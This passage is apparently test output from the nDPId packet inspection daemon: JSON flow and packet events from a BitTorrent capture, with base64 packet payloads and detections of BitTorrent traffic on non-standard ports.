+00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="} 
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAU
EAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="} +00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="} 
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"} 
+01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"} 
+01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="} +00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="} 
+01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="} 
+01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="} 